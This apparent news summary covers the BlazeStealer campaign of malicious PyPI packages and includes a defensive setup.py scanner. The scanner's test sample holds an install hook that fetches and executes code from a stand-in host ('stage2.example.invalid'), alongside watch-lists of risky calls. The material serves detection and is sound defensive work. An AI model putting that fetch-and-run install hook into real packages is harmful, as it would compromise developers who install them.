BlazeStealer [1] [2] [3] [4], a new set of malicious Python packages [1] [3] [4], has recently been discovered on the Python Package Index (PyPI) repository [1] [3] [4]. These packages [1] [3] [4], disguised as harmless obfuscation tools [3], actually contain malware that steals sensitive information from compromised developer systems [1].

Description

BlazeStealer is a collection of eight packages found on PyPI, including Pyobftoexe and Pyobfusfile [3]. Once installed, these packages retrieve a malicious script from an external source, allowing attackers to gain control over a victim’s computer through a Discord bot [4]. This campaign, which began in January 2023 [4], poses significant threats as the malware is capable of executing commands, encrypting files [2] [3] [4], and rendering the computer unusable [3] [4].

According to security researcher Yehuda Gelb [2], BlazeStealer is a Discord bot that carries out various malicious activities [2]. It can steal passwords from web browsers, capture screenshots, disable Microsoft Defender Antivirus [2], and execute arbitrary commands. Additionally, it has the ability to encrypt files, making them inaccessible to the victim.

The majority of downloads of these packages originated from the US [3], followed by China [3] [4], Russia [3] [4], and other countries [3] [4]. In light of this discovery, developers are advised to remain vigilant and carefully vet packages before installing them in order to protect their systems and data.
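The vetting advice above can be made concrete. The following is an added example, not code from the original report or from the campaign itself: a static check that flags the pattern the report describes, a setup.py that overrides a setuptools command so that it fetches and executes code during `pip install`. The watch-lists and both sample setup.py strings are constructed for this example and do not reproduce BlazeStealer's real packages.

```python
import ast  # ast.unparse needs Python 3.9+

# Constructed watch-lists: callee names that, inside a setup.py, usually mean
# the package pulls code from the network or runs it at install time.
NETWORK = {"urlopen", "urlretrieve", "requests.get", "requests.post"}
EXEC = {"exec", "eval", "os.system", "os.popen", "subprocess.Popen",
        "subprocess.check_output", "base64.b64decode"}
HOOKS = {"install", "develop", "egg_info", "build_py"}

def _matches(dotted, names):
    """True if a dotted callee (e.g. urllib.request.urlopen) ends with a watched name."""
    return any(dotted == n or dotted.endswith("." + n) for n in names)

def analyze_setup(src):
    """Statically scan one setup.py source string; returns findings with line numbers."""
    findings = {"install_hook": False, "network": [], "exec": []}
    for node in ast.walk(ast.parse(src)):
        # A subclass of a setuptools command overrides what `pip install` runs.
        if isinstance(node, ast.ClassDef):
            for base in node.bases:
                if _matches(ast.unparse(base), HOOKS):
                    findings["install_hook"] = True
        elif isinstance(node, ast.Call):
            callee = ast.unparse(node.func)
            if _matches(callee, NETWORK):
                findings["network"].append((callee, node.lineno))
            elif _matches(callee, EXEC):
                findings["exec"].append((callee, node.lineno))
    return findings

def is_suspicious(findings):
    """An install hook combined with a fetch or dynamic execution is the pattern to block."""
    return findings["install_hook"] and bool(findings["network"] or findings["exec"])

# Constructed samples, not BlazeStealer's real code: one mimics the described
# pattern (fetch a second stage during install), the other is a plain setup.py.
SAMPLE_BAD = """from setuptools import setup
from setuptools.command.install import install
from urllib.request import urlopen
class PostInstall(install):
    def run(self):
        install.run(self)
        exec(urlopen("http://stage2.example.invalid/s.py").read())
setup(name="pkg", cmdclass={"install": PostInstall})
"""
SAMPLE_OK = 'from setuptools import setup\nsetup(name="pkg", version="1.0")\n'

if __name__ == "__main__":
    print({k: is_suspicious(analyze_setup(s)) for k, s in (("bad", SAMPLE_BAD), ("ok", SAMPLE_OK))})
```

Run it against the `setup.py` of a downloaded sdist before installing; a hit is a reason to read the package source, not proof of malice, since legitimate packages occasionally use install hooks.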

Conclusion

BlazeStealer poses a significant threat to developers and their systems. It is crucial for developers to exercise caution and thoroughly evaluate packages before installation. By remaining vigilant [4], developers can mitigate the risk of falling victim to this malware. The discovery of BlazeStealer also highlights the need for increased security measures and ongoing monitoring of the Python Package Index to prevent similar incidents in the future.

References

[1] https://www.cyberevive.com/2023/11/08/beware-developers-blazestealer-malware-discovered-in-python-packages-on-pypi/
[2] https://icaro.icaromediagroup.com/media/news_stories/politics/icaro-media-group/blazestealer-malware-found-in-python-packages-on-pypi-putting-developers-at-risk/43771815
[3] https://www.redpacketsecurity.com/beware-developers-blazestealer-malware-discovered-in-python-packages-on-pypi/
[4] https://thehackernews.com/2023/11/beware-developers-blazestealer-malware.html